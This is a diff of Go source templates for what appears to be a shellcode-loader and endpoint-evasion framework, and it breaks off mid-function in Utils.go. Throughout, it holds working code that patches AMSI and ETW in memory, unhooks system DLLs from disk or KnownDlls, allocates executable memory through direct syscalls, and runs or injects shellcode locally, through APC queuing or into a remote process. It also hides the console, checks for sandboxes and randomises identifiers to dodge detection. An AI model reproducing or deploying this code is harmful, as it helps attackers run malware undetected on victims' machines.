windows.LoadDLL({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} + func main() { + {{.Variables.Sandbox}} + {{.Variables.ETW}} + {{.Variables.AMSI}} + time.Sleep({{.Variables.SleepSecond}} * time.Millisecond) + {{.Variables.Version}} := {{.Variables.Versionfunc}}() + {{.Variables.VersionMessage}} + if {{.Variables.Version}} == "10" { + {{.Variables.Reloading}} + } + {{.Variables.ETW}} + {{.Variables.hide}} + {{.Variables.raw_bin}} := [loader].{{.Variables.FuncName}}() + {{.Variables.Shellcode_Exec_Function}}({{.Variables.raw_bin}}) } - {{.Variables.handle}} := {{.Variables.loaddll}}.Handle - {{.Variables.dllBase}} := uintptr({{.Variables.handle}}) - {{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress) - {{.Variables.handlez}} := uintptr(0xffffffffffffffff) - var {{.Variables.oldfartcodeperms}} uintptr - {{.Variables.WriteProcessMemory}}({{.Variables.handlez}}, uintptr({{.Variables.dllOffset}}), &{{.Variables.bytes}}[0], uintptr(uint32(len({{.Variables.bytes}}))), & {{.Variables.oldfartcodeperms}}) + {{.Variables.Shellcode_Exec}} - return nil -} - - ` + {{.Variables.ReloadFunction}} +` } -func Procces_Injection() string { +func WriteProcessMemory_Function() string { return ` - package main + const ( + {{.Variables.errnoERROR_IO_PENDING}}= 997 + ) + var {{.Variables.errERROR_IO_PENDING}} error = syscall.Errno({{.Variables.errnoERROR_IO_PENDING}}) + var {{.Variables.procWriteProcessMemory}} = syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc({{.Variables.decode}}("{{.Variables.WriteProcessMemoryName}}")) - import ( + func {{.Variables.WriteProcessMemory}}({{.Variables.hProcess}} uintptr, {{.Variables.lpBaseAddress}} uintptr, {{.Variables.lpBuffer}} *byte, {{.Variables.nSize}} uintptr, {{.Variables.lpNumberOfBytesWritten}} *uintptr) (err error) { + r1, _, e1 := syscall.Syscall6({{.Variables.procWriteProcessMemory}}.Addr(), 5, uintptr({{.Variables.hProcess}}), uintptr({{.Variables.lpBaseAddress}}), uintptr(unsafe.Pointer({{.Variables.lpBuffer}})), uintptr({{.Variables.nSize}}), uintptr(unsafe.Pointer({{.Variables.lpNumberOfBytesWritten}})), 0) + if r1 == 0 { + if e1 != 0 { + err = {{.Variables.errnoErr}}(e1) + } else { + err = syscall.EINVAL + } + } + return + } - "debug/pe" - "encoding/base64" - "encoding/hex" - "[loader]/[loader]" - {{.Variables.DebugImport}} - "io/ioutil" - "syscall" - "fmt" - "time" - "unsafe" - "strconv" - {{.Variables.SandboxOS}} + func {{.Variables.errnoErr}}(e syscall.Errno) error { + switch e { + case 0: + return nil + case {{.Variables.errnoERROR_IO_PENDING}}: + return {{.Variables.errERROR_IO_PENDING}} + } + + return e + } + ` +} - "golang.org/x/sys/windows" - "golang.org/x/sys/windows/registry" +func ETW_Function() string { + return ` + var {{.Variables.procEtwNotificationRegister}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwNotificationRegisterName}}")) + var {{.Variables.procEtwEventRegister}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwEventRegisterName}}")) + var {{.Variables.procEtwEventWriteFull}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwEventWriteFullName}}")) + var {{.Variables.procEtwEventWrite}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwEventWriteName}}")) - ) + func {{.Variables.ETW}}() { + {{.Variables.handle}} := uintptr(0xffffffffffffffff) + {{.Variables.dataAddr}} := []uintptr{ {{.Variables.procEtwNotificationRegister}}.Addr(), {{.Variables.procEtwEventRegister}}.Addr(), {{.Variables.procEtwEventWriteFull}}.Addr(), {{.Variables.procEtwEventWrite}}.Addr()} + for i, _ := range {{.Variables.dataAddr}} { + {{.Variables.data}}, _ := hex.DecodeString("4833C0C3") + var {{.Variables.nLength}} uintptr + {{.Variables.datalength}} := len({{.Variables.data}}) + {{.Variables.WriteProcessMemory}}({{.Variables.handle}}, {{.Variables.dataAddr}}[i], &{{.Variables.data}}[0], uintptr(uint32({{.Variables.datalength}})), &{{.Variables.nLength}}) + } + } -const ( - {{.Variables.PROCESS_ALL_ACCESS}}= 0x1F0FFF -) -var _ unsafe.Pointer + func {{.Variables.RemoteETW}}({{.Variables.handle}} windows.Handle) { + {{.Variables.dataAddr}} := []uintptr{ {{.Variables.procEtwNotificationRegister}}.Addr(), {{.Variables.procEtwEventRegister}}.Addr(), {{.Variables.procEtwEventWriteFull}}.Addr(), {{.Variables.procEtwEventWrite}}.Addr()} + for i, _ := range {{.Variables.dataAddr}} { + {{.Variables.data}}, _ := hex.DecodeString("4833C0C3") + var {{.Variables.nLength}} uintptr + {{.Variables.datalength}} := len({{.Variables.data}}) + {{.Variables.WriteProcessMemory}}(uintptr({{.Variables.handle}}), {{.Variables.dataAddr}}[i], &{{.Variables.data}}[0], uintptr(uint32({{.Variables.datalength}})), &{{.Variables.nLength}}) + } + } -var ( - {{.Variables.customsyscall}} uint16 - {{.Variables.customsyscallVP}} uint16 - {{.Variables.number}} int = {{.Variables.b64number}} -) +` +} +func AMSI_Function() string { + return ` + func {{.Variables.AMSI}}() { + var {{.Variables.handle}} uint64 + {{.Variables.handle}} = 0xffffffffffffffff + {{.Variables.ll}}, _ := windows.LoadLibrary(string([]byte{'a','m','s','i','.','d','l','l'})) + {{.Variables.addr}}, _ := windows.GetProcAddress({{.Variables.ll}}, string([]byte{'a','m','s','i','S','c','a','n','B','u','f','f','e','r'})) + {{.Variables.data}}, _ := hex.DecodeString("B857000780C3") + var {{.Variables.nLength}} uintptr + {{.Variables.datalength}} := len({{.Variables.data}}) + {{.Variables.WriteProcessMemory}}(uintptr({{.Variables.handle}}), uintptr(uint({{.Variables.addr}})), &{{.Variables.data}}[0], uintptr(uint32({{.Variables.datalength}})), &{{.Variables.nLength}}) + } + ` +} +func Procces_Injection() string { + return ` var {{.Variables.procWriteProcessMemory}} = syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc("WriteProcessMemory") var {{.Variables.funcNtCreateThreadEx}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc("NtCreateThreadEx") var {{.Variables.funcNtWriteVirtualMemory}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc("NtWriteVirtualMemory") @@ -1286,9 +650,6 @@ var {{.Variables.procEnumProcessModules}} = syscall.NewLazyDLL(string([]byte{'p' var {{.Variables.procGetModuleBaseName}} = syscall.NewLazyDLL(string([]byte{'p', 's', 'a', 'p', 'i',})).NewProc("GetModuleBaseNameW") var {{.Variables.procGetModuleInformation}} = syscall.NewLazyDLL(string([]byte{'p', 's', 'a', 'p', 'i',})).NewProc("GetModuleInformation") -{{.Variables.Debug}} - - func errno(e1 error) error { if e1, ok := e1.(syscall.Errno); ok && e1 == 0 { e1 = syscall.EINVAL @@ -1421,77 +782,9 @@ func {{.Variables.EnumProcessModules}}({{.Variables.process}} windows.Handle, {{ return {{.Variables.n}}, nil } -func {{.Variables.decode}}({{.Variables.b64}} string,) string { - var {{.Variables.decoded}} []byte - {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString({{.Variables.b64}}) - {{.Variables.sum}} := 1 - for i := 1; i < {{.Variables.number}}; i++ { - {{.Variables.decoded}}, _ = base64.StdEncoding.DecodeString(string({{.Variables.decoded}})) - {{.Variables.sum}} += i - } - return string({{.Variables.decoded}}) - -} - -{{.Variables.Sandboxfunction}} - - -func {{.Variables.Console}}(show bool) { - {{.Variables.getWin}} := syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc({{.Variables.decode}}("{{.Variables.GetConsoleWindowName}}")) - {{.Variables.showWin}} := syscall.NewLazyDLL(string([]byte{'u', 's', 'e', 'r', '3', '2',})).NewProc({{.Variables.decode}}("{{.Variables.ShowWindowName}}")) - {{.Variables.hwnd}}, _, _ := {{.Variables.getWin}}.Call() - if {{.Variables.hwnd}} == 0 { - return - } - if show { - var {{.Variables.SW_RESTORE}} uintptr = 9 - {{.Variables.showWin}}.Call({{.Variables.hwnd}}, {{.Variables.SW_RESTORE}}) - } else { - var {{.Variables.SW_HIDE}} uintptr = 0 - {{.Variables.showWin}}.Call({{.Variables.hwnd}}, {{.Variables.SW_HIDE}}) - } -} - -func {{.Variables.Versionfunc}}() string { - {{.Variables.k}}, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE) - {{.Variables.Version}}, _, _ := {{.Variables.k}}.GetStringValue("CurrentVersion") - {{.Variables.MV}}, _, err := {{.Variables.k}}.GetIntegerValue("CurrentMajorVersionNumber") - if err == nil{ - {{.Variables.MinV}}, _, _ := {{.Variables.k}}.GetIntegerValue("CurrentMinorVersionNumber") - {{.Variables.Version}} = strconv.FormatUint({{.Variables.MV}}, 10) + "." + strconv.FormatUint({{.Variables.MinV}}, 10) - } - defer {{.Variables.k}}.Close() - {{.Variables.VersionMessage}} - {{.Variables.SyscallNumberlist}} - -} - - - -{{.Variables.WriteProcessMemory_Function}} - -{{.Variables.ETW_Function}} - -{{.Variables.AMSI_Function}} - -func {{.Variables.loader}}() { - err := {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'})) - if err != nil { - {{.Variables.RefreshPE}} - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'})) - if err != nil { - {{.Variables.RefreshPE}} - } - err = {{.Variables.Reloading}}(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'})) - if err != nil { - {{.Variables.RefreshPE}} - } - {{.Variables.EDR}} -} -func {{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}} []byte) { +func {{.Variables.FunctionName}}({{.Variables.raw_bin}} []byte) { {{.Variables.pi}} := {{.Variables.CreateProcess}}() {{.Variables.PPIDMessage}} time.Sleep(5 * time.Second) @@ -1532,6 +825,7 @@ func {{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}} []byte) { } } + {{.Variables.RemoteETW}}({{.Variables.hh}}) {{.Variables.Injecting}} {{.Variables.shellcode}} := {{.Variables.raw_bin}} {{.Variables.oldProtect}} := windows.PAGE_READWRITE @@ -1550,22 +844,6 @@ func {{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}} []byte) { {{.Variables.Injected}} } - -func main() { - {{.Variables.Sandbox}} - {{.Variables.ETW}} - {{.Variables.hide}} - {{.Variables.AMSI}} - {{.Variables.Version}} := {{.Variables.Versionfunc}}() - if {{.Variables.Version}} == "10.0" { - {{.Variables.loader}}() - } - {{.Variables.ETW}} - {{.Variables.raw_bin}} := [loader].{{.Variables.FuncName}}() - {{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}}) -} - - func {{.Variables.RemoteModuleReloading}}({{.Variables.name}} string, {{.Variables.addr}} uintptr, {{.Variables.handle}} windows.Handle) error { {{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.name}}) if {{.Variables.error}} != nil { @@ -1588,35 +866,303 @@ func {{.Variables.RemoteModuleReloading}}({{.Variables.name}} string, {{.Variabl return nil } +` +} + +func Syscall_Alloc() string { + return ` + func {{.Variables.FunctionName}}({{.Variables.raw_bin}} []byte){ + var {{.Variables.phandle}} uint64 + var {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.alloctype}}, {{.Variables.protect}} uintptr + {{.Variables.phandle}} = 0xffffffffffffffff + {{.Variables.regionsizep}} := len({{.Variables.raw_bin}}) + {{.Variables.regionsize}} := uintptr({{.Variables.regionsizep}}) + {{.Variables.protect}} = 0x40 + {{.Variables.alloctype}} = 0x3000 + {{.Variables.AllocatingMessage}} + {{.Variables.ptr}} := [loader].[Allocate]({{.Variables.customsyscall}}, {{.Variables.phandle}}, {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.regionsize}}, {{.Variables.alloctype}}, {{.Variables.protect}}, 0) + {{.Variables.buff}} := (*[1890000]byte)(unsafe.Pointer({{.Variables.ptr}})) + for x, y := range []byte({{.Variables.raw_bin}}) { + {{.Variables.buff}} [x] = y + } + {{.Variables.SyscallMessage}} + syscall.Syscall({{.Variables.ptr}}, 0, 0, 0, 0,) + } + ` +} +func Syscall_RtlCopy() string { + return ` + func {{.Variables.FunctionName}}({{.Variables.raw_bin}} []byte){ + {{.Variables.ntdll}} := windows.NewLazySystemDLL("ntdll.dll") + {{.Variables.kernel32}} := windows.NewLazySystemDLL("kernel32") + {{.Variables.RtlCopyMemory}} := {{.Variables.ntdll}}.NewProc("RtlCopyMemory") + {{.Variables.VirtualAlloc}} := {{.Variables.kernel32}}.NewProc("VirtualAlloc") -func {{.Variables.Reloading}}({{.Variables.DLLname}} string) error { - {{.Variables.ReloadingMessage}} - {{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.file}}, {{.Variables.error}} := pe.Open({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} - } - {{.Variables.x}} := {{.Variables.file}}.Section(string([]byte{'.', 't', 'e', 'x', 't'})) - {{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size] - {{.Variables.loaddll}}, {{.Variables.error}} := windows.LoadDLL({{.Variables.DLLname}}) - if {{.Variables.error}} != nil { - return {{.Variables.error}} + var {{.Variables.alloctype}}, {{.Variables.protect}} uintptr + var {{.Variables.oldptrperms}} uintptr + {{.Variables.handle}} := uintptr(0xffffffffffffffff) + {{.Variables.regionsize}} := uintptr(len({{.Variables.raw_bin}})) + {{.Variables.protect}} = 0x40 + {{.Variables.alloctype}} = 0x3000 + {{.Variables.ptr}}, _, _ := {{.Variables.VirtualAlloc}}.Call(0, uintptr(len({{.Variables.raw_bin}})), {{.Variables.alloctype}}, {{.Variables.protect}}) + + {{.Variables.RtlCopyMemoryMessage}} + {{.Variables.RtlCopyMemory}}.Call({{.Variables.ptr}}, (uintptr)(unsafe.Pointer(&{{.Variables.raw_bin}}[0])), uintptr(len({{.Variables.raw_bin}}))) + {{.Variables.VirtualProtectMessage}} + + + + [loader].[NtProtectVirtualMemoryprep]( + {{.Variables.customsyscallVP}}, + {{.Variables.handle}}, + (*uintptr)(unsafe.Pointer(&{{.Variables.ptr}})), + &{{.Variables.regionsize}}, + 0x20, + &{{.Variables.oldptrperms}}, + ) + {{.Variables.SyscallMessage}} + syscall.Syscall({{.Variables.ptr}}, 0, 0, 0, 0) } - {{.Variables.handle}} := {{.Variables.loaddll}}.Handle - {{.Variables.dllBase}} := uintptr({{.Variables.handle}}) - {{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress) - {{.Variables.handlez}} := uintptr(0xffffffffffffffff) - var {{.Variables.oldfartcodeperms}} uintptr +` +} + +func Syscall_NtQueueAPCThreadEx_Local() string { + return ` + const ( + QUEUE_USER_APC_FLAGS_NONE = iota + QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC + QUEUE_USER_APC_FLGAS_MAX_VALUE + ) + - {{.Variables.WriteProcessMemory}}({{.Variables.handlez}}, uintptr({{.Variables.dllOffset}}), (&{{.Variables.bytes}}[0]), uintptr(uint32(len({{.Variables.bytes}}))), & {{.Variables.oldfartcodeperms}}) + func {{.Variables.FunctionName}}({{.Variables.raw_bin}} []byte){ - return nil + {{.Variables.kernel32}} := windows.NewLazySystemDLL("kernel32.dll") + {{.Variables.ntdll}} := windows.NewLazySystemDLL("ntdll.dll") + {{.Variables.RtlCopyMemory}} := {{.Variables.ntdll}}.NewProc("RtlCopyMemory") + {{.Variables.NtQueueApcThreadEx}} := {{.Variables.ntdll}}.NewProc("NtQueueApcThreadEx") + {{.Variables.GetCurrentThread}} := {{.Variables.kernel32}}.NewProc("GetCurrentThread") + + var {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.alloctype}}, {{.Variables.protect}} uintptr + var {{.Variables.phandle}} uint64 + var {{.Variables.oldptrperms}} uintptr + {{.Variables.handle}} := uintptr(0xffffffffffffffff) + {{.Variables.phandle}} = 0xffffffffffffffff + {{.Variables.regionsize}} := uintptr(len({{.Variables.raw_bin}})) + {{.Variables.protect}} = 0x40 + {{.Variables.alloctype}} = 0x3000 + {{.Variables.AllocatingMessage}} + {{.Variables.ptr}} := [loader].[Allocate]({{.Variables.customsyscall}}, {{.Variables.phandle}}, {{.Variables.baseA}}, {{.Variables.zerob}}, uintptr({{.Variables.regionsize}}), {{.Variables.alloctype}}, {{.Variables.protect}}, 0) + {{.Variables.RtlCopyMemoryMessage}} + {{.Variables.RtlCopyMemory}}.Call({{.Variables.ptr}}, (uintptr)(unsafe.Pointer(&{{.Variables.raw_bin}}[0])), uintptr(len({{.Variables.raw_bin}}))) + {{.Variables.VirtualProtectMessage}} + [loader].[NtProtectVirtualMemoryprep]( + {{.Variables.customsyscallVP}}, + {{.Variables.handle}}, + (*uintptr)(unsafe.Pointer(&{{.Variables.ptr}})), + &{{.Variables.regionsize}}, + 0x20, + &{{.Variables.oldptrperms}}, + ) + {{.Variables.GetCurrentThreadMessage}} + {{.Variables.thread}}, _, _ := {{.Variables.GetCurrentThread}}.Call() + {{.Variables.NtQueueApcThreadExMessage}} + {{.Variables.NtQueueApcThreadEx}}.Call({{.Variables.thread}}, QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC, uintptr({{.Variables.ptr}}), 0, 0, 0) + + } +` +} + +func Disk_Refresh() string { + return ` + func {{.Variables.Reloading}} error { + {{.Variables.DLLname}} := []string{string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'}), + string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'}), + string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'a', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l'}), + string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'})} + + for i, _ := range {{.Variables.DLLname}} { + {{.Variables.ReloadingMessage}} + {{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.DLLname}}[i]) + if {{.Variables.error}} != nil { + return {{.Variables.error}} + } + {{.Variables.file}}, {{.Variables.error}} := pe.Open({{.Variables.DLLname}}[i]) + if {{.Variables.error}} != nil { + return {{.Variables.error}} + } + {{.Variables.x}} := {{.Variables.file}}.Section(string([]byte{'.', 't', 'e', 'x', 't'})) + {{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size] + {{.Variables.loaddll}}, {{.Variables.error}} := windows.LoadDLL({{.Variables.DLLname}}[i]) + if {{.Variables.error}} != nil { + return {{.Variables.error}} + } + {{.Variables.handle}} := {{.Variables.loaddll}}.Handle + {{.Variables.dllBase}} := uintptr({{.Variables.handle}}) + {{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress) + {{.Variables.regionsize}} := uintptr(len({{.Variables.bytes}})) + {{.Variables.handlez}} := uintptr(0xffffffffffffffff) + var {{.Variables.oldfartcodeperms}} uintptr + {{.Variables.Address}} := {{.Variables.FindAddress}}() + + {{.Variables.runfunc}}, _ := [loader].[NtProtectVirtualMemoryJMPprep]( + {{.Variables.customsyscallVP}}, + {{.Variables.Address}}, + {{.Variables.handlez}}, + (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), + &{{.Variables.regionsize}}, + 0x40, + &{{.Variables.oldfartcodeperms}}, + ) + if {{.Variables.runfunc}} != 0 { + } + for i := 0; i < len({{.Variables.bytes}}); i++ { + {{.Variables.loc}} := uintptr({{.Variables.dllOffset}} + uint(i)) + {{.Variables.mem}} := (*[1]byte)(unsafe.Pointer({{.Variables.loc}})) + (*{{.Variables.mem}})[0] = {{.Variables.bytes}}[i] + } + {{.Variables.runfunc}}, _ = [loader].[NtProtectVirtualMemoryJMPprep]( + {{.Variables.customsyscallVP}}, + {{.Variables.Address}}, + {{.Variables.handlez}}, + (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), + &{{.Variables.regionsize}}, + 0x20, + &{{.Variables.oldfartcodeperms}}, + ) + } + return nil + } + + + ` } + +func KnownDLL_Refresh() string { + return ` + var {{.Variables.NtOpenSection}} uint16 + var {{.Variables.NtMapViewOfSection}} uint16 + var {{.Variables.mxKeSFQASvbvx}} uint16 + func {{.Variables.Reloading}} { + {{.Variables.DLLname}} := []string{string([]byte{'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'}), + string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'}), + string([]byte{'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'}), + string([]byte{'a', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l'})} + + for i, _ := range {{.Variables.DLLname}} { + KnownDLL({{.Variables.DLLname}}[i]) + } + } + + var procNtOpenSection = syscall.NewLazyDLL("ntdll.dll").NewProc("NtOpenSection") + var procNtMapViewOfSection = syscall.NewLazyDLL("ntdll.dll").NewProc("NtMapViewOfSection") + var procNtUnmapViewOfSection = syscall.NewLazyDLL("ntdll.dll").NewProc("NtUnmapViewOfSection") + + type sstring struct { + PWstr *uint16 + } + func (s sstring) String() string { + return windows.UTF16PtrToString(s.PWstr) + } + func KnownDLL({{.Variables.DLL}} string) []byte { + {{.Variables.ReloadingMessage}} + var {{.Variables.KnownDll}} , {{.Variables.sztViewSize}} , {{.Variables.CleanSystemDLL}} uintptr + {{.Variables.handle}} := uintptr(0xffffffffffffffff) + {{.Variables.ntPathW}} := "\\" + string([]byte{'K', 'n', 'o', 'w', 'n', 'D', 'l', 'l', 's'}) + "\\" + {{.Variables.DLL}} + {{.Variables.ntPath}}, _ := windows.NewNTUnicodeString({{.Variables.ntPathW}}) + {{.Variables.objectAttributes}} := windows.OBJECT_ATTRIBUTES{} + {{.Variables.objectAttributes}}.Attributes = 0x00000040 + {{.Variables.objectAttributes}}.ObjectName = {{.Variables.ntPath}} + {{.Variables.objectAttributes}}.Length = uint32(unsafe.Sizeof(windows.OBJECT_ATTRIBUTES{})) + {{.Variables.Address}} := {{.Variables.FindAddress}}() + {{.Variables.NtOpenSection}} = 0x37 + {{.Variables.ttttt}} := 0x0004 + r, _ := [loader].[NtOpenSectionprep]( + {{.Variables.NtOpenSection}}, + {{.Variables.Address}}, + uintptr(unsafe.Pointer(&{{.Variables.KnownDll}})), + uintptr({{.Variables.ttttt}}), + uintptr(unsafe.Pointer(&{{.Variables.objectAttributes}})), + ) + if r != 0 { + } + {{.Variables.NtMapViewOfSection}} = 0x28 + zero := 0 + one := 1 + [loader].[NtOpenSection]( + {{.Variables.NtMapViewOfSection}}, + {{.Variables.Address}}, + {{.Variables.KnownDll}}, + {{.Variables.handle}}, + uintptr(unsafe.Pointer(&{{.Variables.CleanSystemDLL}})), + uintptr(zero), + uintptr(zero), + uintptr(zero), + uintptr(unsafe.Pointer(&{{.Variables.sztViewSize}})), + uintptr(one), + uintptr(zero), + uintptr(syscall.PAGE_READONLY), + ) + {{.Variables.rawdata}} := rawreader.New({{.Variables.CleanSystemDLL}}, int({{.Variables.sztViewSize}})) + {{.Variables.file}}, _ := pe.NewFileFromMemory({{.Variables.rawdata}}) + {{.Variables.fullbytes}}, err := {{.Variables.file}}.Bytes() + if err != nil { + } + {{.Variables.x}} := {{.Variables.file}}.Section(string([]byte{'.', 't', 'e', 'x', 't'})) + {{.Variables.bytes}} := {{.Variables.fullbytes}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size] + {{.Variables.filee}}, error := filepe.Open(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\'}) + {{.Variables.DLL}} ) + if error != nil { + } + {{.Variables.xx}} := {{.Variables.filee}}.Section(".text") + {{.Variables.loaddlll}}, error := windows.LoadDLL(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\'}) + {{.Variables.DLL}} ) + if error != nil { + } + {{.Variables.ddhandlez}} := {{.Variables.loaddlll}}.Handle + {{.Variables.dllBase}} := uintptr({{.Variables.ddhandlez}}) + {{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.xx}}.VirtualAddress) + {{.Variables.mxKeSFQASvbvx}} = 0x50 + {{.Variables.regionsize}} := uintptr(len({{.Variables.bytes}})) + var {{.Variables.oldfartcodeperms}} uintptr + + {{.Variables.runfunc}}, _ := [loader].[NtProtectVirtualMemoryJMPprep]( + {{.Variables.mxKeSFQASvbvx}}, + {{.Variables.Address}}, + {{.Variables.handle}}, + (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), + &{{.Variables.regionsize}}, + 0x40, + &{{.Variables.oldfartcodeperms}}, + ) + if {{.Variables.runfunc}} != 0 { + } + {{.Variables.WriteMemoryfunc}}({{.Variables.bytes}}, uintptr({{.Variables.dllOffset}})) + {{.Variables.filee}}.Close() + {{.Variables.runfunc}}, _ = [loader].[NtProtectVirtualMemoryJMPprep]( + {{.Variables.mxKeSFQASvbvx}}, + {{.Variables.Address}}, + {{.Variables.handle}}, + (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), + &{{.Variables.regionsize}}, + 0x20, + &{{.Variables.oldfartcodeperms}}, + ) + if {{.Variables.runfunc}} != 0 { + } + syscall.Syscall(uintptr(procNtUnmapViewOfSection.Addr()), 2, uintptr({{.Variables.handle}}), {{.Variables.CleanSystemDLL}}, 0) + return {{.Variables.bytes}} + } + + + func {{.Variables.WriteMemoryfunc}}({{.Variables.inbuf}} []byte, {{.Variables.destination}} uintptr) { + for {{.Variables.index}} := uint32(0); {{.Variables.index}} < uint32(len({{.Variables.inbuf}})); {{.Variables.index}}++ { + {{.Variables.writePtr}} := unsafe.Pointer({{.Variables.destination}} + uintptr({{.Variables.index}})) + {{.Variables.v}} := (*byte)({{.Variables.writePtr}}) + *{{.Variables.v}} = {{.Variables.inbuf}}[{{.Variables.index}}] + } + } + ` } diff --git a/Utils/Utils.go b/Utils/Utils.go index 4f80b88..b68618f 100644 --- a/Utils/Utils.go +++ b/Utils/Utils.go @@ -24,16 +24,19 @@ func Version() { Version := runtime.Version() Version = strings.Replace(Version, "go1.", "", -1) VerNumb, _ := strconv.ParseFloat(Version, 64) - if VerNumb >= 16.1 { + if VerNumb >= 19.1 { } else { - log.Fatal("Error: The version of Go is to old, please update to version 1.16.1 or later") + log.Fatal("Error: The version of Go is to old, please update to version 1.19.1 or later") } } -func ModuleObfuscator(name string, FuncName string) { +func ModuleObfuscator(name string, FuncName string, encryptionmode string) { NTVirProt := Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) NTVirProtpre := Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) Alloc := Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) + NtOpenSectionprep := Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) + NtOpenSection := Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) + NtProtectVirtualMemoryJMPprep := Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) sysid := Cryptor.VarNumberLength(10, 19) processHandle := Cryptor.VarNumberLength(10, 19) @@ -42,11 +45,45 @@ func ModuleObfuscator(name string, FuncName string) { NewProtect := Cryptor.VarNumberLength(10, 19) oldprotect := Cryptor.VarNumberLength(10, 19) loader := Cryptor.VarNumberLength(10, 19) + + syscallA := Cryptor.VarNumberLength(10, 19) + KnownDll := Cryptor.VarNumberLength(10, 19) + ttttt := Cryptor.VarNumberLength(10, 19) + objectAttributes := Cryptor.VarNumberLength(10, 19) + name = name + ".go" + if encryptionmode == "ELZMA" { + PackageEditor("loader/loader.go", "[io_import]", `"io"`) + PackageEditor("loader/loader.go", "[bytes_import]", 